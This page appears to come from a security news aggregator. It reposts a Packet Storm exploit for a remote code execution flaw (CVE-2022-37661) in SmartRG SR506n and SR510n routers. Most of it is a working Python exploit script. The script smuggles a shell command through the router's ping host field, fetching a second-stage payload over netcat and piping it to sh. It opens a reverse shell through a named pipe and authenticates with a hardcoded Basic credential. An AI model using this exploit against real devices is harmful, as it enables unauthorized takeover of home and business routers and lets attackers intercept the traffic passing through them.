Security
Headlines
HeadlinesLatestCVEs

Headline

SmartRG Router 2.6.13 Remote Code Execution

SmartRG Router version 2.6.13 suffers from a remote code execution vulnerability.

Packet Storm
Open in Source
#vulnerability#rce#auth
# Exploit Title: SmartRG Router - Remote Code Execution# Date: 13/06/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://adtran.com# Version: 2.5.15 / 2.6.13 (confirmed)# Tested on: SR506n (2.5.15) & SR510n (2.6.13)# CVE : CVE-2022-37661import requestsfrom subprocess import Popen, PIPErouter_host = "http://192.168.1.1"authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="lhost = "lo"lport = 80payload_port = 81def main():    e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE)    Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout)    send_payload(f"|nc {lhost} {payload_port}|sh")    print("done.. check shell")def get_session():    url = router_host + "/admin/ping.html"    headers = {"Authorization": "Basic {}".format(authorization_header)}    r = requests.get(url, headers=headers).text    i = r.find("&sessionKey=") + len("&sessionKey=")    s = ""    while r[i] != "'":        s = s + r[i]        i = i + 1    return sdef send_payload(payload):    print(payload)    url = router_host + "/admin/pingHost.cmd"    headers = {"Authorization": "Basic {}".format(authorization_header)}    params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()}    requests.get(url, headers=headers, params=params).textmain()

Related news

SmartRG Router SR510n 2.6.13 Remote Code Execution

SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.

CVE-2022-37661: SmartRG Router 2.6.13 Remote Code Execution ≈ Packet Storm

SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.

Packet Storm: Latest News

Pyload Remote Code Execution
Packet Storm